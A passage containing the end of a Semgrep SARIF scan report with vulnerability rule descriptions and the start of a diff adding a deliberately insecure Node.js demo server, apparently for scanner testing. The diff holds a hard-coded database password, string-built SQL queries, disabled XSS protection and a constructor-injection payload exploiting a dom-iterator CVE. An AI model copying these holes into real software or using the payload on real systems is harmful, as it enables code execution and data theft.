application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal","id":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","name":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-path-traversal.laravel-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","id":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","name":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","id":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","name":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","id":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","name":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","id":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","name":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","id":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","name":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"help":{"markdown":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.require-request.require-request)\n - [https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it](https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it)\n","text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"helpUri":"https://semgrep.dev/r/javascript.express.security.require-request.require-request","id":"javascript.express.security.require-request.require-request","name":"javascript.express.security.require-request.require-request","properties":{"precision":"very-high","tags":["CWE-706: Use of Incorrectly-Resolved Name or Reference","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.require-request.require-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","id":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","name":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","id":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","name":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","id":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","name":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","id":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","name":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib","id":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","name":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.code.tainted-code-stdlib.tainted-code-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","id":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","name":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","id":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","name":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/marshal.html](https://docs.python.org/3/library/marshal.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","id":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","name":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid"}}],"semanticVersion":"1.96.0"}}}],"$schema":"https://docs.oasis-open.org/sarif/sarif/v2.1.0/os/schemas/sarif-schema-2.1.0.json"} \ No newline at end of file diff --git a/insecure-js/server.js b/insecure-js/server.js index 888da99..76cf87e 100644 --- a/insecure-js/server.js +++ b/insecure-js/server.js @@ -2,107 +2,330 @@ const http = require('http'); const _ = require('lodash'); const qs = require('querystring'); const semver = require('semver'); -const JSON5 = require('json5') +const JSON5 = require('json5'); +const { sequelize, User, Password } = require('./init_db'); +const sqlite3 = require("sqlite3").verbose(); +const db = new sqlite3.Database("./data.db"); +const mysql = require('mysql2'); +const fs = require('fs'); +const path = require('path'); + +// MySQL Connection Setup +const connection = mysql.createConnection({ + host: 'localhost', + user: 'root', + password: 'topsecret', + database: 'database' +}); + +connection.connect((err) => { + if (err) { + console.error('Error connecting to the MySQL database:', err); + } else { + console.log('Connected to the MySQL database.'); + } +}); const hostname = '0.0.0.0'; const port = 3000; const server = http.createServer((req, res) => { - if (req.method === 'POST') { + // Remove /js prefix from the URL for processing + const requestPath = req.url.replace(/^\/js/, ''); + + if (req.method === 'GET' && requestPath === '/styles.css') { + fs.readFile(path.join(__dirname, 'styles.css'), (err, data) => { + if (err) { + res.writeHead(500, { 'Content-Type': 'text/plain' }); + res.end('Error loading styles.css'); + } else { + res.writeHead(200, { 'Content-Type': 'text/css' }); + res.end(data); + } + }); + } else if (req.method === 'POST') { let body = ''; - req.on('data', chunk => { + req.on('data', (chunk) => { body += chunk.toString(); }); - req.on('end', () => { + + req.on('end', async () => { const postData = qs.parse(body); let responseMessages = []; - // Process template input for lodash vulnerability CVE-2021-23337 - lodash injection - if (postData.template) { + // CVE-2024-21541: dom-iterator + var PUT = require('dom-iterator'); + global.CTF = function() { console.log("GLOBAL.CTF HIT") } // We want to prove we can execute this by using the package + + var parser = require('mini-html-parser'); + var html = '

    '; // Any non-empty html should work + var parser = parser(html); + var node = parser.parse(); + var it = PUT(node); + var next; + while (next = it.next("constructor.constructor('global.CTF()')()")) { } + + // Vulnerability: Missing SameSite Attribute on Cookies + res.setHeader('Set-Cookie', `sessionToken=insecureToken; Path=/; HttpOnly; SameSite=None`); + res.setHeader('Content-Type', 'text/html'); + res.setHeader('X-Content-Type-Options', 'nosniff'); + res.setHeader('X-XSS-Protection', '0'); // Disable browser XSS protection for testing + + // Placeholder for secret key + const SECRET_KEY = process.env.SECRET_KEY || 'PLACEHOLDER_SECRET_KEY'; + responseMessages.push(`

    Current Secret Key: ${SECRET_KEY}

    `); + + // SQL Injection via mysql, but doesn't actually run + if (postData.orderNumber3) { try { - const compiled = _.template(postData.template); - compiled({}); - responseMessages.push(`

    Executed template. Check server console for output.

    `); + const query = `SELECT product FROM Orders WHERE orderNumber = ${postData.orderNumber3};`; + responseMessages.push(`

    Executing SQL query: ${query}

    `); + + connection.query(query, (err, rows) => { + if (err) { + console.error("SQL query error:", err); + responseMessages.push(`

    An error occurred: ${err.message}

    `); + } else { + if (rows.length > 0) { + responseMessages.push(`

    Order details (Product only):

    ${JSON.stringify(rows, null, 2)}
    `); + } else { + responseMessages.push(`

    No orders found with order number ${postData.orderNumber3}

    `); + } + } + + if (res) { + res.end(responseMessages.join("")); + } + }); } catch (error) { - console.error(error); - responseMessages.push(`

    An error occurred: ${error.message}

    `); + console.error("SQL query execution error:", error); + responseMessages.push(`

    An unexpected error occurred: ${error.message}

    `); } } - // Process version range input for semver ReDoS vulnerability //CVE-2022-25883 - semver redos and phantom package - if (postData.versionRange) { - const start = Date.now(); - try { - semver.validRange(postData.versionRange); - const end = Date.now(); - const timeTaken = end - start; - responseMessages.push(`

